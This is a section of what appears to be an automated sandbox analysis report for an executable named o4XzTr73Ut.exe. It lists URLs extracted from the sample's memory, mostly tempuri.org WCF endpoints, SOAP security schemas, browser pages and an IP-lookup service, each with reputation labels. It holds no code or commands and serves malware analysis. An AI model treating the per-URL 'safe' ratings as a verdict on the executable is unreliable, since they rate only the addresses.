                        URLs

                        SourceDetectionScannerLabelLink
                        http://service.r0%URL Reputationsafe
                        http://tempuri.org/Entity/Id12Response0%URL Reputationsafe
                        http://tempuri.org/0%URL Reputationsafe
                        http://tempuri.org/Entity/Id2Response0%URL Reputationsafe
                        http://tempuri.org/Entity/Id21Response0%URL Reputationsafe
                        http://tempuri.org/Entity/Id90%URL Reputationsafe
                        http://tempuri.org/Entity/Id80%URL Reputationsafe
                        http://tempuri.org/Entity/Id50%URL Reputationsafe
                        http://tempuri.org/Entity/Id40%URL Reputationsafe
                        http://tempuri.org/Entity/Id70%URL Reputationsafe
                        http://tempuri.org/Entity/Id60%URL Reputationsafe
                        http://tempuri.org/Entity/Id19Response0%URL Reputationsafe
                        http://www.interoperabilitybridges.com/wmp-extension-for-chrome0%URL Reputationsafe
                        http://tempuri.org/Entity/Id15Response0%URL Reputationsafe
                        http://support.a0%URL Reputationsafe
                        http://tempuri.org/Entity/Id6Response0%URL Reputationsafe
                        https://api.ip.sb/ip0%URL Reputationsafe
                        http://tempuri.org/Entity/Id9Response0%URL Reputationsafe
                        http://tempuri.org/Entity/Id200%URL Reputationsafe
                        http://tempuri.org/Entity/Id210%URL Reputationsafe
                        http://tempuri.org/Entity/Id220%URL Reputationsafe
                        http://tempuri.org/Entity/Id230%URL Reputationsafe
                        http://tempuri.org/Entity/Id240%URL Reputationsafe
                        http://tempuri.org/Entity/Id24Response0%URL Reputationsafe
                        http://tempuri.org/Entity/Id1Response0%URL Reputationsafe
                        http://forms.rea0%URL Reputationsafe
                        http://tempuri.org/Entity/Id100%URL Reputationsafe
                        http://tempuri.org/Entity/Id110%URL Reputationsafe
                        http://tempuri.org/Entity/Id120%URL Reputationsafe
                        http://tempuri.org/Entity/Id16Response0%URL Reputationsafe
                        http://tempuri.org/Entity/Id130%URL Reputationsafe
                        http://tempuri.org/Entity/Id140%URL Reputationsafe
                        http://tempuri.org/Entity/Id150%URL Reputationsafe
                        http://tempuri.org/Entity/Id160%URL Reputationsafe
                        http://tempuri.org/Entity/Id170%URL Reputationsafe
                        http://tempuri.org/Entity/Id180%URL Reputationsafe
                        http://tempuri.org/Entity/Id5Response0%URL Reputationsafe
                        http://tempuri.org/Entity/Id190%URL Reputationsafe
                        http://tempuri.org/Entity/Id10Response0%URL Reputationsafe
                        http://tempuri.org/Entity/Id8Response0%URL Reputationsafe

                        Domains and IPs

                        Contacted Domains

                        No contacted domains info

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Texto4XzTr73Ut.exe, 0000000C.00000002.1060365448.000000001E663000.00000004.00000001.sdmpfalse
                          		high
                          http://schemas.xmlsoap.org/ws/2005/02/sc/scto4XzTr73Ut.exe, 0000000C.00000002.1060365448.000000001E663000.00000004.00000001.sdmpfalse
                            		high
                            https://duckduckgo.com/chrome_newtabo4XzTr73Ut.exe, 0000000C.00000002.1060968348.000000001E95B000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060771307.000000001E88D000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1061518015.000000001F6FA000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1061254455.000000001EACA000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060591933.000000001E7CB000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1061316952.000000001F5F7000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060446492.000000001E707000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060812505.000000001E8A3000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060874834.000000001E913000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1061425020.000000001F689000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000003.1054172659.000000001F7BE000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000003.1054244376.000000001F82F000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060925849.000000001E944000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060486327.000000001E71D000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060365448.000000001E663000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060643656.000000001E7E1000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000003.1054346219.000000001F8A0000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1061125215.000000001EA1C000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1061081457.000000001EA06000.00000004.00000001.sdmpfalse
                              		high
                              http://service.ro4XzTr73Ut.exe, 0000000C.00000002.1060968348.000000001E95B000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060486327.000000001E71D000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060643656.000000001E7E1000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1061125215.000000001EA1C000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://schemas.xmlsoap.org/ws/2004/04/security/sc/dko4XzTr73Ut.exe, 0000000C.00000002.1060365448.000000001E663000.00000004.00000001.sdmpfalse
                                		high
                                https://duckduckgo.com/ac/?q=o4XzTr73Ut.exe, 0000000C.00000002.1060968348.000000001E95B000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060771307.000000001E88D000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1061518015.000000001F6FA000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1061254455.000000001EACA000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060591933.000000001E7CB000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1061316952.000000001F5F7000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060446492.000000001E707000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060812505.000000001E8A3000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060874834.000000001E913000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1061425020.000000001F689000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000003.1054172659.000000001F7BE000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000003.1054244376.000000001F82F000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060925849.000000001E944000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060486327.000000001E71D000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060365448.000000001E663000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060643656.000000001E7E1000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000003.1054346219.000000001F8A0000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1061125215.000000001EA1C000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1061081457.000000001EA06000.00000004.00000001.sdmpfalse
                                  		high
                                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinaryo4XzTr73Ut.exe, 0000000C.00000002.1060365448.000000001E663000.00000004.00000001.sdmpfalse
                                    		high
                                    http://tempuri.org/Entity/Id12Responseo4XzTr73Ut.exe, 0000000C.00000002.1060319888.000000001E5D1000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060365448.000000001E663000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://tempuri.org/o4XzTr73Ut.exe, 0000000C.00000002.1060319888.000000001E5D1000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060365448.000000001E663000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://tempuri.org/Entity/Id2Responseo4XzTr73Ut.exe, 0000000C.00000002.1060319888.000000001E5D1000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060365448.000000001E663000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1o4XzTr73Ut.exe, 0000000C.00000002.1060365448.000000001E663000.00000004.00000001.sdmpfalse
                                      		high
                                      http://tempuri.org/Entity/Id21Responseo4XzTr73Ut.exe, 0000000C.00000002.1060319888.000000001E5D1000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrapo4XzTr73Ut.exe, 0000000C.00000002.1060365448.000000001E663000.00000004.00000001.sdmpfalse
                                        		high
                                        http://tempuri.org/Entity/Id9o4XzTr73Ut.exe, 0000000C.00000002.1060319888.000000001E5D1000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLIDo4XzTr73Ut.exe, 0000000C.00000002.1060365448.000000001E663000.00000004.00000001.sdmpfalse
                                          		high
                                          http://tempuri.org/Entity/Id8o4XzTr73Ut.exe, 0000000C.00000002.1060319888.000000001E5D1000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://tempuri.org/Entity/Id5o4XzTr73Ut.exe, 0000000C.00000002.1060319888.000000001E5D1000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepareo4XzTr73Ut.exe, 0000000C.00000002.1060365448.000000001E663000.00000004.00000001.sdmpfalse
                                            		high
                                            http://tempuri.org/Entity/Id4o4XzTr73Ut.exe, 0000000C.00000002.1060319888.000000001E5D1000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://tempuri.org/Entity/Id7o4XzTr73Ut.exe, 0000000C.00000002.1060319888.000000001E5D1000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://tempuri.org/Entity/Id6o4XzTr73Ut.exe, 0000000C.00000002.1060319888.000000001E5D1000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecreto4XzTr73Ut.exe, 0000000C.00000002.1060365448.000000001E663000.00000004.00000001.sdmpfalse
                                              		high
                                              https://support.google.com/chrome/?p=plugin_realo4XzTr73Ut.exe, 0000000C.00000002.1060968348.000000001E95B000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060486327.000000001E71D000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060643656.000000001E7E1000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1061125215.000000001EA1C000.00000004.00000001.sdmpfalse
                                                		high
                                                http://tempuri.org/Entity/Id19Responseo4XzTr73Ut.exe, 0000000C.00000002.1060319888.000000001E5D1000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#licenseo4XzTr73Ut.exe, 0000000C.00000002.1060365448.000000001E663000.00000004.00000001.sdmpfalse
                                                  		high
                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issueo4XzTr73Ut.exe, 0000000C.00000002.1060365448.000000001E663000.00000004.00000001.sdmpfalse
                                                    		high
                                                    http://schemas.xmlsoap.org/ws/2004/08/addressing/faultlo4XzTr73Ut.exe, 0000000C.00000002.1060319888.000000001E5D1000.00000004.00000001.sdmpfalse
                                                      		high
                                                      http://www.interoperabilitybridges.com/wmp-extension-for-chromeo4XzTr73Ut.exe, 0000000C.00000002.1060968348.000000001E95B000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060486327.000000001E71D000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060643656.000000001E7E1000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1061125215.000000001EA1C000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/Abortedo4XzTr73Ut.exe, 0000000C.00000002.1060365448.000000001E663000.00000004.00000001.sdmpfalse
                                                        		high
                                                        http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequenceo4XzTr73Ut.exe, 0000000C.00000002.1060319888.000000001E5D1000.00000004.00000001.sdmpfalse
                                                          		high
                                                          https://support.google.com/chrome/?p=plugin_pdfo4XzTr73Ut.exe, 0000000C.00000002.1060968348.000000001E95B000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060486327.000000001E71D000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060643656.000000001E7E1000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1061125215.000000001EA1C000.00000004.00000001.sdmpfalse
                                                            		high
                                                            http://schemas.xmlsoap.org/ws/2004/10/wsat/faulto4XzTr73Ut.exe, 0000000C.00000002.1060365448.000000001E663000.00000004.00000001.sdmpfalse
                                                              		high
                                                              http://schemas.xmlsoap.org/ws/2004/10/wsato4XzTr73Ut.exe, 0000000C.00000002.1060365448.000000001E663000.00000004.00000001.sdmpfalse
                                                                		high
                                                                http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeyo4XzTr73Ut.exe, 0000000C.00000002.1060365448.000000001E663000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  http://tempuri.org/Entity/Id15Responseo4XzTr73Ut.exe, 0000000C.00000002.1060319888.000000001E5D1000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060365448.000000001E663000.00000004.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameo4XzTr73Ut.exe, 0000000C.00000002.1060365448.000000001E663000.00000004.00000001.sdmpfalse
                                                                    		high
                                                                    http://forms.real.com/real/realone/download.html?type=rpsp_uso4XzTr73Ut.exe, 0000000C.00000002.1060968348.000000001E95B000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060486327.000000001E71D000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060643656.000000001E7E1000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1061125215.000000001EA1C000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      http://support.ao4XzTr73Ut.exe, 0000000C.00000002.1060968348.000000001E95B000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060486327.000000001E71D000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060643656.000000001E7E1000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1061125215.000000001EA1C000.00000004.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renewo4XzTr73Ut.exe, 0000000C.00000002.1060365448.000000001E663000.00000004.00000001.sdmpfalse
                                                                        		high
                                                                        http://schemas.xmlsoap.org/ws/2004/10/wscoor/Registero4XzTr73Ut.exe, 0000000C.00000002.1060365448.000000001E663000.00000004.00000001.sdmpfalse
                                                                          		high
                                                                          http://tempuri.org/Entity/Id6Responseo4XzTr73Ut.exe, 0000000C.00000002.1060319888.000000001E5D1000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060365448.000000001E663000.00000004.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKeyo4XzTr73Ut.exe, 0000000C.00000002.1060365448.000000001E663000.00000004.00000001.sdmpfalse
                                                                            		high
                                                                            https://api.ip.sb/ipo4XzTr73Ut.exe, 0000000C.00000002.1061972250.0000000020640000.00000004.00020000.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1061316952.000000001F5F7000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000003.1004258087.000000000089A000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060215267.000000001E3E0000.00000004.00020000.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060365448.000000001E663000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060066764.000000001E130000.00000004.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exeo4XzTr73Ut.exe, 0000000C.00000002.1061125215.000000001EA1C000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              https://support.google.com/chrome/?p=plugin_quicktimeo4XzTr73Ut.exe, 0000000C.00000002.1060968348.000000001E95B000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060486327.000000001E71D000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060643656.000000001E7E1000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1061125215.000000001EA1C000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                http://schemas.xmlsoap.org/ws/2004/04/sco4XzTr73Ut.exe, 0000000C.00000002.1060365448.000000001E663000.00000004.00000001.sdmpfalse
                                                                                  		high
                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PCo4XzTr73Ut.exe, 0000000C.00000002.1060365448.000000001E663000.00000004.00000001.sdmpfalse
                                                                                    		high
                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancelo4XzTr73Ut.exe, 0000000C.00000002.1060365448.000000001E663000.00000004.00000001.sdmpfalse
                                                                                      		high
                                                                                      http://tempuri.org/Entity/Id9Responseo4XzTr73Ut.exe, 0000000C.00000002.1060319888.000000001E5D1000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060365448.000000001E663000.00000004.00000001.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=o4XzTr73Ut.exe, 0000000C.00000002.1060968348.000000001E95B000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060771307.000000001E88D000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1061518015.000000001F6FA000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1061254455.000000001EACA000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060591933.000000001E7CB000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1061316952.000000001F5F7000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060446492.000000001E707000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060812505.000000001E8A3000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060874834.000000001E913000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1061425020.000000001F689000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000003.1054172659.000000001F7BE000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000003.1054244376.000000001F82F000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060925849.000000001E944000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060486327.000000001E71D000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060365448.000000001E663000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060643656.000000001E7E1000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000003.1054346219.000000001F8A0000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1061125215.000000001EA1C000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1061081457.000000001EA06000.00000004.00000001.sdmpfalse
                                                                                        		high
                                                                                        http://tempuri.org/Entity/Id20o4XzTr73Ut.exe, 0000000C.00000002.1060319888.000000001E5D1000.00000004.00000001.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        http://tempuri.org/Entity/Id21o4XzTr73Ut.exe, 0000000C.00000002.1060319888.000000001E5D1000.00000004.00000001.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        http://tempuri.org/Entity/Id22o4XzTr73Ut.exe, 0000000C.00000002.1060319888.000000001E5D1000.00000004.00000001.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1o4XzTr73Ut.exe, 0000000C.00000002.1060365448.000000001E663000.00000004.00000001.sdmpfalse
                                                                                          		high
                                                                                          http://tempuri.org/Entity/Id23o4XzTr73Ut.exe, 0000000C.00000002.1060319888.000000001E5D1000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060365448.000000001E663000.00000004.00000001.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          http://nsis.sf.net/NSIS_ErrorErroro4XzTr73Ut.exefalse
                                                                                            		high
                                                                                            http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1o4XzTr73Ut.exe, 0000000C.00000002.1060365448.000000001E663000.00000004.00000001.sdmpfalse
                                                                                              		high
                                                                                              http://tempuri.org/Entity/Id24o4XzTr73Ut.exe, 0000000C.00000002.1060319888.000000001E5D1000.00000004.00000001.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issueo4XzTr73Ut.exe, 0000000C.00000002.1060365448.000000001E663000.00000004.00000001.sdmpfalse
                                                                                                		high
                                                                                                http://tempuri.org/Entity/Id24Responseo4XzTr73Ut.exe, 0000000C.00000002.1060319888.000000001E5D1000.00000004.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                http://tempuri.org/Entity/Id1Responseo4XzTr73Ut.exe, 0000000C.00000002.1060319888.000000001E5D1000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060365448.000000001E663000.00000004.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequestedo4XzTr73Ut.exe, 0000000C.00000002.1060319888.000000001E5D1000.00000004.00000001.sdmpfalse
                                                                                                  		high
                                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnlyo4XzTr73Ut.exe, 0000000C.00000002.1060365448.000000001E663000.00000004.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    http://schemas.xmlsoap.org/ws/2004/10/wsat/Replayo4XzTr73Ut.exe, 0000000C.00000002.1060365448.000000001E663000.00000004.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegoo4XzTr73Ut.exe, 0000000C.00000002.1060365448.000000001E663000.00000004.00000001.sdmpfalse
                                                                                                        		high
                                                                                                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binaryo4XzTr73Ut.exe, 0000000C.00000002.1060365448.000000001E663000.00000004.00000001.sdmpfalse
                                                                                                          		high
                                                                                                          http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PCo4XzTr73Ut.exe, 0000000C.00000002.1060365448.000000001E663000.00000004.00000001.sdmpfalse
                                                                                                            		high
                                                                                                            http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKeyo4XzTr73Ut.exe, 0000000C.00000002.1060365448.000000001E663000.00000004.00000001.sdmpfalse
                                                                                                              		high
                                                                                                              http://schemas.xmlsoap.org/ws/2004/08/addressingo4XzTr73Ut.exe, 0000000C.00000002.1060319888.000000001E5D1000.00000004.00000001.sdmpfalse
                                                                                                                		high
                                                                                                                https://support.google.com/chrome/?p=plugin_shockwaveo4XzTr73Ut.exe, 0000000C.00000002.1061125215.000000001EA1C000.00000004.00000001.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://forms.reao4XzTr73Ut.exe, 0000000C.00000002.1060968348.000000001E95B000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060486327.000000001E71D000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060643656.000000001E7E1000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1061125215.000000001EA1C000.00000004.00000001.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issueo4XzTr73Ut.exe, 0000000C.00000002.1060365448.000000001E663000.00000004.00000001.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://schemas.xmlsoap.org/ws/2004/10/wsat/Completiono4XzTr73Ut.exe, 0000000C.00000002.1060365448.000000001E663000.00000004.00000001.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://schemas.xmlsoap.org/ws/2004/04/trusto4XzTr73Ut.exe, 0000000C.00000002.1060365448.000000001E663000.00000004.00000001.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://tempuri.org/Entity/Id10o4XzTr73Ut.exe, 0000000C.00000002.1060319888.000000001E5D1000.00000004.00000001.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        		unknown
                                                                                                                        http://tempuri.org/Entity/Id11o4XzTr73Ut.exe, 0000000C.00000002.1060319888.000000001E5D1000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060365448.000000001E663000.00000004.00000001.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        		unknown
                                                                                                                        http://tempuri.org/Entity/Id12o4XzTr73Ut.exe, 0000000C.00000002.1060319888.000000001E5D1000.00000004.00000001.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        		unknown
                                                                                                                        http://tempuri.org/Entity/Id16Responseo4XzTr73Ut.exe, 0000000C.00000002.1060319888.000000001E5D1000.00000004.00000001.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        		unknown
                                                                                                                        http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponseo4XzTr73Ut.exe, 0000000C.00000002.1060365448.000000001E663000.00000004.00000001.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancelo4XzTr73Ut.exe, 0000000C.00000002.1060365448.000000001E663000.00000004.00000001.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://tempuri.org/Entity/Id13o4XzTr73Ut.exe, 0000000C.00000002.1060319888.000000001E5D1000.00000004.00000001.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            		unknown
                                                                                                                            http://tempuri.org/Entity/Id14o4XzTr73Ut.exe, 0000000C.00000002.1060319888.000000001E5D1000.00000004.00000001.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            		unknown
                                                                                                                            http://tempuri.org/Entity/Id15o4XzTr73Ut.exe, 0000000C.00000002.1060319888.000000001E5D1000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060365448.000000001E663000.00000004.00000001.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            		unknown
                                                                                                                            http://tempuri.org/Entity/Id16o4XzTr73Ut.exe, 0000000C.00000002.1060319888.000000001E5D1000.00000004.00000001.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            		unknown
                                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/Nonceo4XzTr73Ut.exe, 0000000C.00000002.1060365448.000000001E663000.00000004.00000001.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://tempuri.org/Entity/Id17o4XzTr73Ut.exe, 0000000C.00000002.1060319888.000000001E5D1000.00000004.00000001.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              		unknown
                                                                                                                              http://tempuri.org/Entity/Id18o4XzTr73Ut.exe, 0000000C.00000002.1060319888.000000001E5D1000.00000004.00000001.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              		unknown
                                                                                                                              http://tempuri.org/Entity/Id5Responseo4XzTr73Ut.exe, 0000000C.00000002.1060319888.000000001E5D1000.00000004.00000001.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              		unknown
                                                                                                                              http://tempuri.org/Entity/Id19o4XzTr73Ut.exe, 0000000C.00000002.1060319888.000000001E5D1000.00000004.00000001.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              		unknown
                                                                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnso4XzTr73Ut.exe, 0000000C.00000002.1060319888.000000001E5D1000.00000004.00000001.sdmpfalse
                                                                                                                                		high
